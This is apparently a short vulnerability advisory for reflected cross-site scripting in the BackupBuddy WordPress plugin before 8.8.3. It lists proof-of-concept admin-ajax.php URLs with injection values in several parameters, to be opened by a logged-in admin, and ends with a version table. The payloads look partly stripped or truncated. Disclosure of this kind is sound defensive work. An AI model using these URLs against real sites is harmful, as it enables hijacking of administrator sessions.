The plugin does not sanitise and escape some parameters before outputting them back in various places, leading to Reflected Cross-Site Scripting
Make a logged in admin/SA open one of the URL below: v < 8.8.3 https://example.com/wp-admin/admin-ajax.php?action=pb_backupbuddy_backupbuddy&function;=restore_file_view&archive;=--!>\- https://example.com/wp-admin/admin-ajax.php?action=pb_backupbuddy_backupbuddy&function;=restore_file_view&file;=--!>\- v < 8.8.2 https://example.com/wp-admin/admin-ajax.php?action=pb_backupbuddy_backupbuddy&function;=view_log&serial;="> v < 8.8.1 https://example.com/wp-admin/admin-ajax.php?action=pb_backupbuddy_backupbuddy&function;=destination_picker&add;=local&filter;=local&callback;_data=
CPE | Name | Operator | Version |
---|---|---|---|
backupbuddy | lt | 8.8.3 |